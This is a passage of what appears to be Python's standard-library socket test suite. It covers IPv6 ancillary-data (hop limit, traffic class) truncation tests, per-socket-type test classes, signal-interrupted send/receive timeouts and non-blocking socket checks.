@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
    @testSecondCmsgTruncInData.client_skip
    def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
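
# Illustrative, standalone sketch (not used by the test classes below) of the
# ancillary-buffer arithmetic that the truncation tests above rely on:
# CMSG_LEN() is the exact size of one header plus its payload, without
# trailing padding, while CMSG_SPACE() includes the padding, so a buffer
# meant for several items should be the sum of their CMSG_SPACE() values.
# The payload length of 4 below is an arbitrary example value.
def _demo_cmsg_sizes(payload_len=4):
    import socket
    if not (hasattr(socket, "CMSG_LEN") and hasattr(socket, "CMSG_SPACE")):
        return None                          # not available on this platform
    exact = socket.CMSG_LEN(payload_len)     # header + payload, no padding
    padded = socket.CMSG_SPACE(payload_len)  # header + payload + padding
    return exact, padded                     # padded >= exact always holds
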
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests.  Installs a
    # SIGALRM handler that raises ZeroDivisionError (so that blocking
    # calls are interrupted), and removes it on teardown along with any
    # scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
self.addCleanup(self.setAlarm, 0)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError
        # (from the SIGALRM handler) when interrupted by a signal.
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
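
# A minimal, standalone sketch (not part of the test classes above or below)
# of the interruption technique these tests exercise: install a SIGALRM
# handler that raises, schedule the alarm with setitimer(), and let it break
# out of a blocking recv().  SIGALRM/setitimer are POSIX-only; the socket
# type and timings here are illustrative assumptions.
def _demo_interrupted_recv():
    import signal
    import socket

    def handler(signum, frame):
        raise ZeroDivisionError          # raising here aborts the blocking call

    old_handler = signal.signal(signal.SIGALRM, handler)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(4.0)                 # longer than the alarm below
    signal.setitimer(signal.ITIMER_REAL, 0.05)
    try:
        sock.recv(1024)                  # blocks; the alarm interrupts it
    except ZeroDivisionError:
        return True                      # interrupted as expected
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)
        signal.signal(signal.SIGALRM, old_handler)
        sock.close()
    return False
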
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
@unittest.skipUnless(thread, 'Threading required for this test.')
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError (from the SIGALRM handler) when interrupted
        # by a signal.
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
@unittest.skipUnless(thread, 'Threading required for this test.')
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
